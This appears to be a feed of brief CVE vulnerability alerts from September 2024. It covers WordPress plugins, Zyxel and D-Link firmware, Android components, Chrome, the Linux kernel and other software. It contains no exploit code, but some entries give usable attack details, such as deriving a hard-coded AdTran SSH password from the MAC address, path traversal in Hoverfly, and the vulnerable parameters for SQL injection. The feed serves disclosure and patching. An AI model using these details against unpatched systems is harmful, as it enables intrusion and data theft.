🚨 CVE-2024-8121The The Ultimate WordPress Toolkit – WP Extended plugin for WordPress is vulnerable to unauthorized modification of user names due to a missing capability check on the wpext_change_admin_name() function in all versions up to, and including, 3.0.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change an admin's username to a username of their liking as long as the default 'admin' was used.🎖@cveNotify |
|
| 2024-09-04 07:37:29 |
🚨 CVE-2024-8119The The Ultimate WordPress Toolkit – WP Extended plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the page parameter in all versions up to, and including, 3.0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-09-04 07:37:26 |
🚨 CVE-2024-8106The The Ultimate WordPress Toolkit – WP Extended plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.8 via the download_user_ajax function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including usernames, hashed passwords, and emails.🎖@cveNotify |
|
| 2024-09-04 07:37:25 |
🚨 CVE-2024-8102The The Ultimate WordPress Toolkit – WP Extended plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the module_all_toggle_ajax() function in all versions up to, and including, 3.0.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.🎖@cveNotify |
|
| 2024-09-04 07:37:24 |
🚨 CVE-2023-2541The Web Frontend of KNIME Business Hub before 1.4.0 allows an unauthenticated remote attacker to access internals about the application such as versions, host names, or IP addresses. No personal information or application data was exposed.🎖@cveNotify |
|
| 2024-09-04 06:37:43 |
🚨 CVE-2024-34652Incorrect authorization in kperfmon prior to SMR Sep-2024 Release 1 allows local attackers to access information related to performance including app usage.🎖@cveNotify |
|
| 2024-09-04 06:37:36 |
🚨 CVE-2024-34649Improper access control in new Dex Mode in multitasking framework prior to SMR Sep-2024 Release 1 allows physical attackers to temporarily access an unlocked screen.🎖@cveNotify |
|
| 2024-09-04 06:37:35 |
🚨 CVE-2024-34647Incorrect use of privileged API in DualDarManagerProxy prior to SMR Sep-2024 Release 1 allows local attackers to access privileged APIs related to knox without proper license.🎖@cveNotify |
|
| 2024-09-04 06:37:31 |
🚨 CVE-2024-34644Improper access control in item selection related in Dressroom prior to SMR Sep-2024 Release 1 allows local attackers to access protected data. User interaction is required for triggering this vulnerability.🎖@cveNotify |
|
| 2024-09-04 06:37:30 |
🚨 CVE-2024-34642Improper authorization in One UI Home prior to SMR Sep-2024 Release 1 allows physical attackers to temporarily access sensitive information.🎖@cveNotify |
|
| 2024-09-04 06:37:26 |
🚨 CVE-2024-34640Improper access control vulnerability in BGProtectManager prior to SMR Sep-2024 Release 1 allows local attackers to bypass restriction of process expiration.🎖@cveNotify |
|
| 2024-09-04 06:37:25 |
🚨 CVE-2024-34637Improper access control in WindowManagerService prior to SMR Sep-2024 Release 1 in Android 12, and SMR Jun-2024 Release 1 in Android 13 and Android 14 allows local attackers to bypass restrictions on starting services from the background.🎖@cveNotify |
|
| 2024-09-04 03:37:31 |
🚨 CVE-2024-8298Memory request vulnerability in the memory management moduleImpact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-09-04 03:37:30 |
🚨 CVE-2024-45448Page table protection configuration vulnerability in the trusted firmware moduleImpact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-09-04 03:37:29 |
🚨 CVE-2024-45447Access control vulnerability in the camera framework moduleImpact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-09-04 03:37:26 |
🚨 CVE-2024-45445Vulnerability of resources not being closed or released in the keystore moduleImpact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-09-04 03:37:25 |
🚨 CVE-2024-45443Directory traversal vulnerability in the cust moduleImpact: Successful exploitation of this vulnerability will affect availability and confidentiality.🎖@cveNotify |
|
| 2024-09-04 03:37:24 |
🚨 CVE-2024-39921Observable timing discrepancy issue exists in IPCOM EX2 Series V01L02NF0001 to V01L06NF0401, V01L20NF0001 to V01L20NF0401, V02L20NF0001 to V02L21NF0301, and IPCOM VE2 Series V01L04NF0001 to V01L06NF0112. If this vulnerability is exploited, some of the encrypted communication may be decrypted by an attacker who can obtain the contents of the communication.🎖@cveNotify |
|
| 2024-09-04 02:37:26 |
🚨 CVE-2024-45442Vulnerability of permission verification for APIs in the DownloadProviderMain moduleImpact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-09-04 02:37:25 |
🚨 CVE-2024-42039Access control vulnerability in the SystemUI moduleImpact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-09-04 02:37:24 |
🚨 CVE-2023-52106Vulnerability of permission verification for APIs in the DownloadProviderMain module.Impact: Successful exploitation of this vulnerability will affect integrity and availability.🎖@cveNotify |
|
| 2024-09-04 01:37:25 |
🚨 CVE-2024-41927Cleartext transmission of sensitive information vulnerability exists in multiple IDEC PLCs. If an attacker sends a specific command to PLC's serial communication port, user credentials may be obtained. As a result, the program of the PLC may be obtained, and the PLC may be manipulated.🎖@cveNotify |
|
| 2024-09-04 01:37:24 |
🚨 CVE-2024-41716Cleartext storage of sensitive information vulnerability exists in WindLDR and WindO/I-NV4. If this vulnerability is exploited, an attacker who obtained the product's project file may obtain user credentials of the PLC or Operator Interfaces. As a result, an attacker may be able to manipulate and/or suspend the PLC and Operator Interfaces by accessing or hijacking them.🎖@cveNotify |
|
| 2024-09-04 01:07:38 |
🚨 CVE-2021-20124A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.🎖@cveNotify |
|
| 2024-09-04 01:07:37 |
🚨 CVE-2021-20123A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.🎖@cveNotify |
|
| 2024-09-03 23:37:25 |
🚨 CVE-2024-8362Use after free in WebAudio in Google Chrome prior to 128.0.6613.119 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-09-03 23:37:24 |
🚨 CVE-2024-7970Out of bounds write in V8 in Google Chrome prior to 128.0.6613.119 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-09-03 22:37:24 |
🚨 CVE-2024-39345AdTran 834-5 HDC17600021F1 (SmartOS 11.1.1.1) devices enable the SSH service by default and have a hidden, undocumented, hard-coded support account whose password is based on the devices MAC address. All of the devices internet interfaces share a similar MAC address that only varies in their final octet. This allows network-adjacent attackers to derive the support user's SSH password by decrementing the final octet of the connected gateway address or via the BSSID. An attacker can then execute arbitrary OS commands with root-level privileges. NOTE: The vendor states that there is no intended functionality allowing an attacker to execute arbitrary OS Commands with root-level privileges. The vendor also states that this issue was fixed in SmartOS 12.5.5.1.🎖@cveNotify |
|
| 2024-09-03 22:07:25 |
🚨 CVE-2024-6750The Social Auto Poster plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 5.3.14. This makes it possible for unauthenticated attackers to add, modify, or delete post meta and plugin options.🎖@cveNotify |
|
| 2024-09-03 22:07:24 |
🚨 CVE-2024-38354CodiMD allows realtime collaborative markdown notes on all platforms. The notebook feature of Hackmd.io permits the rendering of iframe `HTML` tags with an improperly sanitized `name` attribute. This vulnerability enables attackers to perform cross-site scripting (XSS) attacks via DOM clobbering. This vulnerability is fixed in 2.5.4.🎖@cveNotify |
|
| 2024-09-03 21:37:32 |
🚨 CVE-2023-51957Tenda AX1803 v1.0.0.1 contains a stack overflow via the iptv.stb.mode parameter in the function formGetIptv.🎖@cveNotify |
|
| 2024-09-03 21:37:26 |
🚨 CVE-2023-51961Tenda AX1803 v1.0.0.1 contains a stack overflow via the adv.iptv.stballvlans parameter in the function formGetIptv.🎖@cveNotify |
|
| 2024-09-03 21:37:25 |
🚨 CVE-2023-45558An issue in Golden v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-09-03 21:37:24 |
🚨 CVE-2023-46755Vulnerability of input parameters being not strictly verified in the input. Successful exploitation of this vulnerability may cause the launcher to restart.🎖@cveNotify |
|
| 2024-09-03 21:07:30 |
🚨 CVE-2024-39579Dell PowerScale OneFS versions 8.2.2.x through 9.8.0.0 contains an incorrect privilege assignment vulnerability. A local high privileged attacker could potentially exploit this vulnerability to gain root-level access.🎖@cveNotify |
|
| 2024-09-03 21:07:29 |
🚨 CVE-2024-39578Dell PowerScale OneFS versions 8.2.2.x through 9.8.0.1 contains a UNIX symbolic link (symlink) following vulnerability. A local high privileged attacker could potentially exploit this vulnerability, leading to denial of service, information tampering.🎖@cveNotify |
|
| 2024-09-03 21:07:26 |
🚨 CVE-2024-5212The tagDiv Composer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘envato_code[]’ parameter in all versions up to, and including, 5.0 due to insufficient input sanitization and output escaping within the on_ajax_register_forum_user function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-09-03 21:07:25 |
🚨 CVE-2024-7936A vulnerability classified as critical has been found in itsourcecode Project Expense Monitoring System 1.0. This affects an unknown part of the file transferred_report.php. The manipulation of the argument start/end/employee leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-03 21:07:24 |
🚨 CVE-2023-7028An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.🎖@cveNotify |
|
| 2024-09-03 20:37:25 |
🚨 CVE-2023-46483Cross Site Scripting vulnerability in timetec AWDMS v.2.0 allows an attacker to obtain sensitive information via a crafted payload to the remark parameter of the New Zone function.🎖@cveNotify |
|
| 2024-09-03 20:37:24 |
🚨 CVE-2023-41993The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2024-09-03 20:07:33 |
🚨 CVE-2024-7654An ActiveMQ Discovery service was reachable by default from an OpenEdge Management installation when an OEE/OEM auto-discovery feature was activated. Unauthorized access to the discovery service's UDP port allowed content injection into parts of the OEM web interface making it possible for other types of attack that could spoof or deceive web interface users. Unauthorized use of the OEE/OEM discovery service was remediated by deactivating the discovery service by default.🎖@cveNotify |
|
| 2024-09-03 20:07:26 |
🚨 CVE-2024-7345Local ABL Client bypass of the required PASOE security checks may allow an attacker to commit unauthorized code injection into Multi-Session Agents on supported OpenEdge LTS platforms up to OpenEdge LTS 11.7.18 and LTS 12.2.13 on all supported release platforms🎖@cveNotify |
|
| 2024-09-03 20:07:25 |
🚨 CVE-2024-45586This vulnerability exists due to improper access controls on APIs in the Authentication module of Symphony XTS Web Trading and Mobile Trading platforms (version 2.0.0.1_P160). An authenticated remote attacker could exploit this vulnerability by manipulating parameters through HTTP request which could lead to unauthorized account take over belonging to other users.🎖@cveNotify |
|
| 2024-09-03 19:37:32 |
🚨 CVE-2022-48619An issue was discovered in drivers/input/input.c in the Linux kernel before 5.17.10. An attacker can cause a denial of service (panic) because input_set_capability mishandles the situation in which an event code falls outside of a bitmap.🎖@cveNotify |
|
| 2024-09-03 19:37:26 |
🚨 CVE-2023-50124Flient Smart Door Lock v1.0 is vulnerable to Use of Default Credentials. Due to default credentials on a debug interface, in combination with certain design choices, an attacker can unlock the Flient Smart Door Lock by replacing the fingerprint that is stored on the scanner.🎖@cveNotify |
|
| 2024-09-03 19:37:25 |
🚨 CVE-2023-28134Local attacker can escalate privileges on affected installations of Check Point Harmony Endpoint/ZoneAlarm Extreme Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-09-03 19:37:24 |
🚨 CVE-2023-45284On Windows, The IsLocal function does not correctly detect reserved device names in some cases. Reserved names followed by spaces, such as "COM1 ", and reserved names "COM" and "LPT" followed by superscript 1, 2, or 3, are incorrectly reported as local. With fix, IsLocal now correctly reports these names as non-local.🎖@cveNotify |
|
| 2024-09-03 19:07:25 |
🚨 CVE-2024-33895Cosy+ devices running a firmware 21.x below 21.2s10 or a firmware 22.x below 22.1s3 use a unique key to encrypt the configuration parameters. This is fixed in version 21.2s10 and 22.1s3, the key is now unique per device.🎖@cveNotify |
|
| 2024-09-03 19:07:24 |
🚨 CVE-2024-33893Cosy+ devices running a firmware 21.x below 21.2s10 or a firmware 22.x below 22.1s3 are vulnerable to XSS when displaying the logs due to improper input sanitization. This is fixed in version 21.2s10 and 22.1s3.🎖@cveNotify |
|
| 2024-09-03 17:37:26 |
🚨 CVE-2023-49233Insufficient access checks in Visual Planning Admin Center 8 before v.1 Build 240207 allow attackers in possession of a non-administrative Visual Planning account to utilize functions normally reserved for administrators. The affected functions allow attackers to obtain different types of configured credentials and potentially elevate their privileges to administrator level.🎖@cveNotify |
|
| 2024-09-03 17:37:25 |
🚨 CVE-2024-45435Chartist 1.x through 1.3.0 allows Prototype Pollution via the extend function.🎖@cveNotify |
|
| 2024-09-03 17:37:24 |
🚨 CVE-2023-5992A vulnerability was found in OpenSC where PKCS#1 encryption padding removal is not implemented as side-channel resistant. This issue may result in the potential leak of private data.🎖@cveNotify |
|
| 2024-09-03 16:37:30 |
🚨 CVE-2024-45622ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.🎖@cveNotify |
|
| 2024-09-03 16:37:26 |
🚨 CVE-2024-7691The Flaming Forms WordPress plugin through 1.0.1 does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks against administrators.🎖@cveNotify |
|
| 2024-09-03 16:37:25 |
🚨 CVE-2023-45560An issue in Yasukawa memberscard v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-09-03 15:37:54 |
🚨 CVE-2024-43946Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in SKT Themes SKT Blocks – Gutenberg based Page Builder allows Stored XSS.This issue affects SKT Blocks – Gutenberg based Page Builder: from n/a through 1.5.🎖@cveNotify |
|
| 2024-09-03 15:37:47 |
🚨 CVE-2024-43934Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Robert Felty Collapsing Archives allows Stored XSS.This issue affects Collapsing Archives: from n/a through 3.0.5.🎖@cveNotify |
|
| 2024-09-03 15:37:46 |
🚨 CVE-2024-45056zksolc is a Solidity compiler for ZKsync. All LLVM versions since 2015 fold `(xor (shl 1, x), -1)` to `(rotl ~1, x)` if run with optimizations enabled. Here `~1` is generated as an unsigned 64 bits number (`2^64-1`). This number is zero-extended to 256 bits on EraVM target while it should have been sign-extended. Thus instead of producing `roti 2^256 - 1, x` the compiler produces `rotl 2^64 - 1, x`. Analysis has shown that no contracts were affected by the date of publishing this advisory. This issue has been addressed in version 1.5.3. Users are advised to upgrade and redeploy all contracts. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-09-03 15:37:42 |
🚨 CVE-2024-43788Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-09-03 15:37:41 |
🚨 CVE-2013-6040MW6 Aztec, DataMatrix, and MaxiCode ActiveX controls before version 4.0 vulnerable to arbitrary code via a crafted HTML document. Latest versions (4.0) of MW6 Aztec, DataMatrix, and MaxiCode ActiveX controls have resolved the issue🎖@cveNotify |
|
| 2024-09-03 15:07:37 |
🚨 CVE-2024-42412Cross-site scripting vulnerability exists in WAB-I1750-PS and WAB-S1167-PS due to improper processing of input values in menu.cgi. If a user views a malicious web page while logged in to the product, an arbitrary script may be executed on the user's web browser.🎖@cveNotify |
|
| 2024-09-03 15:07:30 |
🚨 CVE-2024-5879The HubSpot – CRM, Email Marketing, Live Chat, Forms & Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' attribute of the HubSpot Meeting Widget in all versions up to, and including, 11.1.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-09-03 15:07:29 |
🚨 CVE-2024-5784The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized administrative actions execution due to a missing capability checks on multiple functions like treport_quiz_atttempt_delete and tutor_gc_class_action in all versions up to, and including, 2.7.2. This makes it possible for authenticated attackers, with the subscriber-level access and above, to preform an administrative actions on the site, like comments, posts or users deletion, viewing notifications, etc.🎖@cveNotify |
|
| 2024-09-03 14:38:14 |
🚨 CVE-2024-8331A vulnerability was found in OpenRapid RapidCMS up to 1.3.1. It has been classified as critical. This affects an unknown part of the file /admin/user/user-move-run.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-03 14:38:07 |
🚨 CVE-2024-7858The Media Library Folders plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several AJAX functions in the media-library-plus.php file in all versions up to, and including, 8.2.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several actions related to managing media files and folder along with controlling settings.🎖@cveNotify |
|
| 2024-09-03 14:38:06 |
🚨 CVE-2024-7006A null pointer dereference flaw was found in Libtiff via `tif_dirinfo.c`. This issue may allow an attacker to trigger memory allocation failures through certain means, such as restricting the heap space size or injecting faults, causing a segmentation fault. This can cause an application crash, eventually leading to a denial of service.🎖@cveNotify |
|
| 2024-09-03 14:08:19 |
🚨 CVE-2024-43872In the Linux kernel, the following vulnerability has been resolved:RDMA/hns: Fix soft lockup under heavy CEQE loadCEQEs are handled in interrupt handler currently. This may cause theCPU core staying in interrupt context too long and lead to soft lockupunder heavy load.Handle CEQEs in BH workqueue and set an upper limit for the number ofCEQE handled by a single call of work handler.🎖@cveNotify |
|
| 2024-09-03 14:08:12 |
🚨 CVE-2024-43862In the Linux kernel, the following vulnerability has been resolved:net: wan: fsl_qmc_hdlc: Convert carrier_lock spinlock to a mutexThe carrier_lock spinlock protects the carrier detection. While it isheld, framer_get_status() is called which in turn takes a mutex.This is not correct and can lead to a deadlock.A run with PROVE_LOCKING enabled detected the issue: [ BUG: Invalid wait context ] ... c204ddbc (&framer->mutex){+.+.}-{3:3}, at: framer_get_status+0x40/0x78 other info that might help us debug this: context-{4:4} 2 locks held by ifconfig/146: #0: c0926a38 (rtnl_mutex){+.+.}-{3:3}, at: devinet_ioctl+0x12c/0x664 #1: c2006a40 (&qmc_hdlc->carrier_lock){....}-{2:2}, at: qmc_hdlc_framer_set_carrier+0x30/0x98Avoid the spinlock usage and convert carrier_lock to a mutex.🎖@cveNotify |
|
| 2024-09-03 14:08:11 |
🚨 CVE-2024-42308In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Check for NULL pointer[why & how]Need to make sure plane_state is initializedbefore accessing its members.(cherry picked from commit 295d91cbc700651782a60572f83c24861607b648)🎖@cveNotify |
|
| 2024-09-03 13:07:37 |
🚨 CVE-2024-8338A vulnerability was found in HFO4 shudong-share 2.4.7. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /includes/fileReceive.php of the component File Extension Handler. The manipulation of the argument file leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-09-03 13:07:30 |
🚨 CVE-2024-8335A vulnerability classified as critical has been found in OpenRapid RapidCMS up to 1.3.1. Affected is an unknown function of the file /resource/runlogon.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-03 13:07:29 |
🚨 CVE-2024-8260A SMB force-authentication vulnerability exists in all versions of OPA for Windows prior to v0.68.0. The vulnerability exists because of improper input validation, allowing a user to pass an arbitrary SMB share instead of a Rego file as an argument to OPA CLI or to one of the OPA Go library’s functions.🎖@cveNotify |
|
| 2024-09-03 12:37:25 |
🚨 CVE-2024-44921SeaCMS v12.9 was discovered to contain a SQL injection vulnerability via the id parameter at /dmplayer/dmku/index.php?ac=del.🎖@cveNotify |
|
| 2024-09-03 12:37:24 |
🚨 CVE-2024-44920A cross-site scripting (XSS) vulnerability in the component admin_collect_news.php of SeaCMS v12.9 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the siteurl parameter.🎖@cveNotify |
|
| 2024-09-03 10:37:26 |
🚨 CVE-2024-45587This vulnerability exists in Symphony XTS Web Trading platform version 2.0.0.1_P160 due to improper access controls on APIs in the Transaction module of vulnerable application. An authenticated remote attacker could exploit this vulnerability by manipulating parameters through HTTP request which could lead to compromise of other user accounts.🎖@cveNotify |
|
| 2024-09-03 10:37:25 |
🚨 CVE-2024-3655Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations to gain access to already freed memory.This issue affects Bifrost GPU Kernel Driver: from r43p0 through r49p0; Valhall GPU Kernel Driver: from r43p0 through r49p0; Arm 5th Gen GPU Architecture Kernel Driver: from r43p0 through r49p0.🎖@cveNotify |
|
| 2024-09-03 10:37:24 |
🚨 CVE-2024-38811VMware Fusion (13.x before 13.6) contains a code-execution vulnerability due to the usage of an insecure environment variable. A malicious actor with standard user privileges may exploit this vulnerability to execute code in the context of the Fusion application.🎖@cveNotify |
|
| 2024-09-03 06:37:24 |
🚨 CVE-2024-37136Dell Path to PowerProtect, versions 1.1, 1.2, contains an Exposure of Private Personal Information to an Unauthorized Actor vulnerability. A remote high privileged attacker could potentially exploit this vulnerability, leading to information exposure.🎖@cveNotify |
|
| 2024-09-03 03:37:25 |
🚨 CVE-2024-7261The improper neutralization of special elements in the parameter "host" in the CGI program of Zyxel NWA1123ACv3 firmware version 6.70(ABVT.4) and earlier, WAC500 firmware version 6.70(ABVS.4) and earlier, WAX655E firmware version 7.00(ACDO.1) and earlier, WBE530 firmware version 7.00(ACLE.1) and earlier, and USG LITE 60AX firmware version V2.00(ACIP.2) could allow an unauthenticated attacker to execute OS commands by sending a crafted cookie to a vulnerable device.🎖@cveNotify |
|
| 2024-09-03 03:37:24 |
🚨 CVE-2024-42061A reflected cross-site scripting (XSS) vulnerability in the CGI program "dynamic_script.cgi" of Zyxel ATP series firmware versions from V4.32 through V5.38, USG FLEX series firmware versions from V4.50 through V5.38, USG FLEX 50(W) series firmware versions from V4.16 through V5.38, and USG20(W)-VPN series firmware versions from V4.16 through V5.38 could allow an attacker to trick a user into visiting a crafted URL with the XSS payload. The attacker could obtain browser-based information if the malicious script is executed on the victim’s browser.🎖@cveNotify |
|
| 2024-09-03 02:37:30 |
🚨 CVE-2024-6343A buffer overflow vulnerability in the CGI program of Zyxel ATP series firmware versions from V4.32 through V5.38, USG FLEX series firmware versions from V4.50 through V5.38, USG FLEX 50(W) series firmware versions from V4.16 through V5.38, and USG20(W)-VPN series firmware versions from V4.16 through V5.38 could allow an authenticated attacker with administrator privileges to cause denial of service (DoS) conditions by sending a crafted HTTP request to a vulnerable device.🎖@cveNotify |
|
| 2024-09-03 02:37:26 |
🚨 CVE-2024-42060A post-authentication command injection vulnerability in Zyxel ATP series firmware versions from V4.32 through V5.38, USG FLEX series firmware versions from V4.50 through V5.38, USG FLEX 50(W) series firmware versions from V4.16 through V5.38, and USG20(W)-VPN series firmware versions from V4.16 through V5.38 could allow an authenticated attacker with administrator privileges to execute some OS commands on an affected device by uploading a crafted internal user agreement file to the vulnerable device.🎖@cveNotify |
|
| 2024-09-03 02:37:25 |
🚨 CVE-2024-42058A null pointer dereference vulnerability in Zyxel ATP series firmware versions from V4.32 through V5.38, USG FLEX series firmware versions from V4.50 through V5.38, USG FLEX 50(W) series firmware versions from V5.20 through V5.38, and USG20(W)-VPN series firmware versions from V5.20 through V5.38 could allow an unauthenticated attacker to cause DoS conditions by sending crafted packets to a vulnerable device.🎖@cveNotify |
|
| 2024-09-03 02:37:24 |
🚨 CVE-2024-42057A command injection vulnerability in the IPSec VPN feature of Zyxel ATP series firmware versions from V4.32 through V5.38, USG FLEX series firmware versions from V4.50 through V5.38, USG FLEX 50(W) series firmware versions from V4.16 through V5.38, and USG20(W)-VPN series firmware versions from V4.16 through V5.38 could allow an unauthenticated attacker to execute some OS commands on an affected device by sending a crafted username to the vulnerable device. Note that this attack could be successful only if the device was configured in User-Based-PSK authentication mode and a valid user with a long username exceeding 28 characters exists.🎖@cveNotify |
|
| 2024-09-03 01:37:24 |
🚨 CVE-2024-8380A vulnerability was found in SourceCodester Contact Manager with Export to VCF 1.0. It has been rated as critical. This issue affects some unknown processing of the file /endpoint/delete-account.php of the component Delete Contact Handler. The manipulation of the argument contact leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-02 21:37:24 |
🚨 CVE-2024-45623D-Link DAP-2310 Hardware A Firmware 1.16RC028 allows remote attackers to execute arbitrary code via a stack-based buffer overflow in the ATP binary that handles PHP HTTP GET requests for the Apache HTTP Server (httpd). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-09-02 20:37:24 |
🚨 CVE-2024-1621The registration process of uniFLOW Online (NT-ware product) apps, prior to and including version 2024.1.0, can be compromised when email login is enabled on the tenant. Those tenants utilising email login in combination with Microsoft Safe Links or similar are impacted. This vulnerability may allow the attacker to register themselves against a genuine user in the system and allow malicious users with similar access and capabilities via the app to the existing genuine user.🎖@cveNotify |
|
| 2024-09-02 19:37:25 |
🚨 CVE-2024-45622ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.🎖@cveNotify |
|
| 2024-09-02 19:37:24 |
🚨 CVE-2024-45621The Electron desktop application of Rocket.Chat through 6.3.4 allows stored XSS via links in an uploaded file, related to failure to use a separate browser upon encountering third-party external actions from PDF documents.🎖@cveNotify |
|
| 2024-09-02 18:37:42 |
🚨 CVE-2024-6920Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NAC Telecommunication Systems Inc. NACPremium allows Stored XSS.This issue affects NACPremium: through 01082024.🎖@cveNotify |
|
| 2024-09-02 18:37:41 |
🚨 CVE-2024-6919Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in NAC Telecommunication Systems Inc. NACPremium allows Blind SQL Injection.This issue affects NACPremium: through 01082024.🎖@cveNotify |
|
| 2024-09-02 18:37:38 |
🚨 CVE-2024-45388Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The `/api/v2/simulation` POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server. Note that, although the code prevents absolute paths from being specified, an attacker can escape out of the `hf.Cfg.ResponsesBodyFilesPath` base path by using `../` segments and reach any arbitrary files. This issue was found using the Uncontrolled data used in path expression CodeQL query for python. Users are advised to make sure the final path (`filepath.Join(hf.Cfg.ResponsesBodyFilesPath, filePath)`) is contained within the expected base path (`filepath.Join(hf.Cfg.ResponsesBodyFilesPath, "/")`). This issue is also tracked as GHSL-2023-274.🎖@cveNotify |
|
| 2024-09-02 18:37:37 |
🚨 CVE-2024-45312Overleaf is a web-based collaborative LaTeX editor. Overleaf Community Edition and Server Pro prior to version 5.0.7 (or 4.2.7 for the 4.x series) contain a vulnerability that allows an arbitrary language parameter in client spelling requests to be passed to the `aspell` executable running on the server. This causes `aspell` to attempt to load a dictionary file with an arbitrary filename. File access is limited to the scope of the overleaf server. The problem is patched in versions 5.0.7 and 4.2.7. Previous versions can be upgraded using the Overleaf toolkit `bin/upgrade` command. Users unable to upgrade may block POST requests to `/spelling/check` via a Web Application Firewall will prevent access to the vulnerable spell check feature. However, upgrading is advised.🎖@cveNotify |
|
| 2024-09-02 18:37:36 |
